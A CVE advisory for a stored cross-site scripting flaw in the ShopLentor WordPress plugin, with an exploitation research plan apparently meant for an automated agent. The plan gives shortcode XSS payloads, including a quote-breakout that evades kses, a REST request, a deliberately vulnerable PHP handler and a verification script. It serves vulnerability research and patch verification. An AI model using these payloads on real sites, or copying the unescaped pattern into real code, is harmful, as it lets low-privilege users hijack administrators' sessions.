CVE-2026-4059

ShopLentor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'button_text' Shortcode Attribute

Severity: medium
Weakness: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 6.4
Patched in: 3.3.6
Time to patch: 1d

Description

The ShopLentor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the woolentor_quickview_button shortcode's button_text attribute in all versions up to, and including, 3.3.5. This is due to insufficient input sanitization and missing output escaping on user-supplied shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 3.3.5
Published: April 13, 2026
Last updated: April 14, 2026
Affected plugin: woolentor-addons

What Changed in the Fix

Changes introduced in v3.3.6


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-4059

1. Vulnerability Summary

The ShopLentor (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the button_text attribute of the woolentor_quickview_button shortcode. In versions up to and including 3.3.5, the plugin fails to sanitize the attribute input and fails to escape it upon output. This allows authenticated users with Contributor-level permissions or higher to inject arbitrary JavaScript into pages.

2. Attack Vector Analysis

  • Shortcode: [woolentor_quickview_button]
  • Vulnerable Attribute: button_text
  • Authentication Requirement: Contributor+ (any role allowed to create/edit posts).
  • Precondition: The ShopLentor plugin must be active. WooCommerce is normally required for the Quick View button to do anything useful, but whether the handler still renders button_text without WooCommerce depends on where the shortcode is registered, which the available snippets do not show; test both states.
  • Endpoint: Standard WordPress post creation/editing via wp-admin/post.php, or the REST API (POST /wp-json/wp/v2/posts).

3. Code Flow

While the specific shortcode handler file (likely includes/shortcodes/class.quickview_button.php or similar) was not provided in the snippets, the architectural pattern in ShopLentor (visible in classes/class.widgets_control.php and includes/addons/wb_product_reviews.php) indicates a structure where attributes are extracted and rendered:

  1. Registration: The plugin registers the shortcode using add_shortcode( 'woolentor_quickview_button', [ $this, 'render_shortcode' ] ).
  2. Parsing: When a post is viewed, WordPress parses [woolentor_quickview_button button_text="PAYLOAD"].
  3. Handler Execution: The handler receives the $atts array. Typically, it uses shortcode_atts() to merge defaults.
  4. Vulnerable Sink: The code likely executes a statement similar to:
    // Inferred Vulnerable Logic:
    $button_text = $atts['button_text'];
    return '<button class="...">' . $button_text . '</button>'; 
    // OR
    echo '<button class="..." data-text="' . $button_text . '">';
    
  5. Result: Because $button_text is neither sanitized via sanitize_text_field() on input nor escaped via esc_html() or esc_attr() at the output context, the value lands in the page verbatim. Output escaping is the control that closes the hole: sanitize_text_field() strips tags but leaves double quotes in place, so on its own it would not stop an attribute breakout.
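The two shapes of the sink, as an added illustration rather than ShopLentor's own code: a minimal shortcode in the pattern the plan infers above, first as the vulnerable version and then hardened with the WordPress sanitize-on-input, escape-per-output-context pair. The handler names, the CSS class and the data-product-id attribute are assumptions; dropped into wp-content/mu-plugins/ on a test site, both shortcodes can be rendered with do_shortcode() to compare the output.

```php
<?php
/**
 * Added illustration (not ShopLentor's code): a quick-view button shortcode
 * in the shape the research plan infers, first as the vulnerable pattern,
 * then hardened. Handler names, the CSS class and the data-product-id
 * attribute are hypothetical. Place in wp-content/mu-plugins/ on a test site.
 */

// Vulnerable pattern: the attribute value is concatenated into HTML
// unescaped. A value such as  x" onmouseover="alert(1)  contains no tag,
// so wp_kses leaves it alone on save; here it breaks out of the title
// attribute, and the same value reaches the element body unescaped.
add_shortcode( 'demo_quickview_button_vuln', 'demo_quickview_button_vuln' );
function demo_quickview_button_vuln( $atts ) {
    $atts = shortcode_atts(
        array( 'button_text' => 'Quick View', 'product_id' => 0 ),
        $atts,
        'demo_quickview_button_vuln'
    );
    return '<button class="ht-quickview" title="' . $atts['button_text'] . '" '
         . 'data-product-id="' . $atts['product_id'] . '">'
         . $atts['button_text'] . '</button>';
}

// Hardened pattern: sanitize on input (coerce the id to an integer, strip
// tags and control characters from the label) and escape for each output
// context (esc_attr inside attributes, esc_html in the element body).
// Escaping is what stops the XSS; sanitize_text_field() alone would not,
// because it does not encode double quotes.
add_shortcode( 'demo_quickview_button_safe', 'demo_quickview_button_safe' );
function demo_quickview_button_safe( $atts ) {
    $atts = shortcode_atts(
        array( 'button_text' => 'Quick View', 'product_id' => 0 ),
        $atts,
        'demo_quickview_button_safe'
    );
    $label = sanitize_text_field( $atts['button_text'] );
    $id    = absint( $atts['product_id'] );
    return sprintf(
        '<button class="ht-quickview" title="%1$s" data-product-id="%2$d">%3$s</button>',
        esc_attr( $label ),
        $id,
        esc_html( $label )
    );
}
```

With the breakout value above, the vulnerable handler emits a live onmouseover attribute, while the hardened one emits title="x&quot; onmouseover=&quot;alert(1)" and the same text, entity-encoded, as the button label.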

4. Nonce Acquisition Strategy

For Stored XSS via Shortcode Attributes, a specific plugin nonce is usually not required. The attacker utilizes the standard WordPress post-creation flow.

  1. Context: The execution agent will act as a Contributor.
  2. Standard Post Creation: WordPress core handles nonces for saving posts (_wpnonce in the post editor).
  3. REST API: with cookie authentication the request must carry the wp_rest nonce in the X-WP-Nonce header; with an application password (Basic auth, available since WordPress 5.6) no nonce is needed.
  4. Action:
    • Navigate to wp-admin/post-new.php.
    • Use browser_eval to extract the _wpnonce for saving the post if using traditional form submission, or the wp_rest nonce from window.wpApiSettings.nonce if using the REST API.

5. Exploitation Strategy

The goal is to create a post as a Contributor containing the malicious shortcode and verify that an Admin viewing the post triggers the script.

Step-by-Step Plan:

  1. Login: Authenticate as a Contributor user.
  2. Create Post: Send an HTTP request to create a new post with the malicious shortcode. A Contributor lacks the unfiltered_html capability, so the post content is passed through wp_kses (wp_filter_post_kses on content_save_pre) before it is stored: a <script> tag is removed and an onerror attribute is stripped from <img>, so Payloads 1 and 2 as written do not survive the save. A value that contains no HTML tag passes kses untouched, so Payload 3 is the one to try first.
    • Payload 1 (Label Injection, stripped by kses for Contributors): [woolentor_quickview_button button_text="<script>alert('XSS_BY_SHORTCODE')</script>"]
    • Payload 2 (Attribute Breakout with a tag, stripped by kses for Contributors): [woolentor_quickview_button button_text='"><img src=x onerror=alert("XSS_BY_SHORTCODE")>']
    • Payload 3 (Attribute Breakout without a tag): [woolentor_quickview_button button_text='XSS_BY_SHORTCODE" onmouseover="alert(1)']. This fires only if the plugin places button_text inside an HTML attribute; for an element-body sink the tag-free value is inert, so inspect the rendered markup to see which context applies.
  3. Submit: A Contributor cannot publish; set the status to pending (the REST API answers "publish" from a Contributor with 403 rest_cannot_publish). An Editor or Administrator reviewing the submission renders it.
  4. Trigger: Open the front-end preview of the pending post (?p=<ID>&preview=true) as the reviewing user, or as the Contributor to observe self-execution.

HTTP Request Example (REST API, cookie authentication: the logged-in session cookie is sent with the request and X-WP-Nonce carries the wp_rest nonce; with an application password, send an Authorization: Basic header instead):

POST /wp-json/wp/v2/posts HTTP/1.1
Host: localhost
Content-Type: application/json
X-WP-Nonce: [REST_NONCE]

{
  "title": "QuickView Test",
  "content": "[woolentor_quickview_button button_text='Vulnerable_ShopLentor\" onmouseover=\"alert(1)']",
  "status": "pending"
}

6. Test Data Setup

  1. User: Create a user with the contributor role.
    • wp user create attacker attacker@example.com --role=contributor --user_pass=password
  2. Plugin State: Ensure woolentor-addons is active.
  3. WooCommerce: Ideally, WooCommerce should be active as the "Quick View" functionality is tied to it, ensuring the shortcode logic is fully initialized.

7. Expected Results

  1. The HTTP request to create the post returns 201 Created. The response body already tells most of the story: content.raw is the shortcode as stored after wp_kses, and content.rendered is the output of the the_content filter with shortcodes expanded, so an unescaped double quote after the marker there means the sink does not escape.
  2. When the pending post is previewed (?p=<ID>&preview=true), the HTML source contains the unescaped payload.
  3. The browser executes the JavaScript when the injected handler fires (e.g. the onmouseover alert).

8. Verification Steps

  1. Database Check: Use WP-CLI to confirm the content is stored raw (the post is pending, so include non-published statuses):
    wp post list --post_type=post --post_status=any --fields=ID,post_status,post_content | grep "woolentor_quickview_button"
    
  2. DOM Inspection: Use browser_navigate to the post's preview URL (?p=<ID>&preview=true) as the reviewing user, confirm the marker is present, then check that the breakout produced a real attribute rather than encoded text:
    browser_eval("document.body.innerHTML.includes('XSS_BY_SHORTCODE')")
    browser_eval("document.querySelector('[onmouseover*=\"alert\"]') !== null")
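The test data setup, expected results and verification steps above, folded into one WP-CLI script as an added example (not from the advisory or the plugin). Run it with wp eval-file on a test site where ShopLentor is active and the attacker Contributor from the setup section exists: it stores a post the way a Contributor can (status pending, content filtered by wp_kses because the role lacks unfiltered_html) and then renders it through the the_content filter to see whether button_text comes out unescaped. The marker string and the file name are constructed for this check; because the shortcode's exact markup is not known from the snippets, the script prints the rendered HTML when it cannot decide.

```php
<?php
/**
 * Added verification script (not part of the advisory or of ShopLentor).
 * Usage on a test site:  wp eval-file check-cve-2026-4059.php
 * Assumes the 'attacker' Contributor from the test data setup exists.
 * The marker value below is constructed for this check.
 */

if ( ! defined( 'WP_CLI' ) ) {
    exit( "Run this with: wp eval-file check-cve-2026-4059.php\n" );
}
if ( ! shortcode_exists( 'woolentor_quickview_button' ) ) {
    WP_CLI::error( 'Shortcode woolentor_quickview_button is not registered; is ShopLentor active?' );
}

$user = get_user_by( 'login', 'attacker' );
if ( ! $user ) {
    WP_CLI::error( 'Create the test user first: wp user create attacker attacker@example.com --role=contributor' );
}
// Switching user re-runs kses_init(), so the content_save_pre filters that
// apply to a Contributor are in place for wp_insert_post() below.
wp_set_current_user( $user->ID );
if ( current_user_can( 'unfiltered_html' ) ) {
    WP_CLI::error( 'Test user has unfiltered_html; the check would not reflect a Contributor.' );
}

// Breakout-style value with no HTML tag, so wp_kses leaves it intact.
// esc_attr()/esc_html() on output would turn the double quote into &quot;.
$marker  = 'cve2026-4059" onmouseover="alert(1)';
$content = "[woolentor_quickview_button button_text='{$marker}']";

$post_id = wp_insert_post( array(
    'post_title'   => 'QuickView shortcode check',
    'post_content' => $content,
    'post_status'  => 'pending',   // a Contributor cannot publish
    'post_type'    => 'post',
    'post_author'  => $user->ID,
), true );
if ( is_wp_error( $post_id ) ) {
    WP_CLI::error( $post_id->get_error_message() );
}

// Stored content: confirms kses did not strip the shortcode or the marker.
$stored = get_post_field( 'post_content', $post_id );
if ( strpos( $stored, $marker ) === false ) {
    wp_delete_post( $post_id, true );
    WP_CLI::error( 'Marker did not survive storage (kses rewrote it): ' . $stored );
}

// Same filter chain the front end and the preview use, shortcodes included.
$html = apply_filters( 'the_content', $stored );
wp_delete_post( $post_id, true );

if ( strpos( $html, $marker ) !== false ) {
    WP_CLI::warning( 'VULNERABLE: button_text was rendered unescaped: ' . $marker );
} elseif ( strpos( $html, 'cve2026-4059&quot;' ) !== false ) {
    WP_CLI::success( 'Escaped: the double quote was encoded on output.' );
} else {
    WP_CLI::log( 'Marker not found in output; inspect the rendered HTML manually:' );
    WP_CLI::log( $html );
}
```

The raw-quote check detects a missing escape in either an attribute or an element-body sink; whether the value is actually exploitable depends on the context, which the printed HTML shows. The post is deleted at the end so repeated runs do not accumulate pending posts.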
    

9. Alternative Approaches

If the button_text is rendered inside an Elementor Widget rather than a standard WordPress shortcode:

  1. Elementor Editor Path: The vulnerability might manifest in the Elementor preview.
  2. Draft Preview: Contributors can save drafts. An Admin reviewing the draft would trigger the XSS.
  3. Other Attributes: If button_text is patched, check other attributes like product_id (if reflected) or class_name which are often processed similarly in the same shortcode handler.

Potential Localization Variables (if AJAX-based):

Based on classes/class.assest_management.php, look for:

  • woolentor_addons_localize (Inferred from common plugin naming conventions).
  • Check wp_localize_script calls in classes/class.assest_management.php (The provided source is truncated but reveals extensive script registration).
  • Use browser_eval("window.woolentor_addons_localize") to find any nonces if an AJAX-based shortcode rendering occurs.
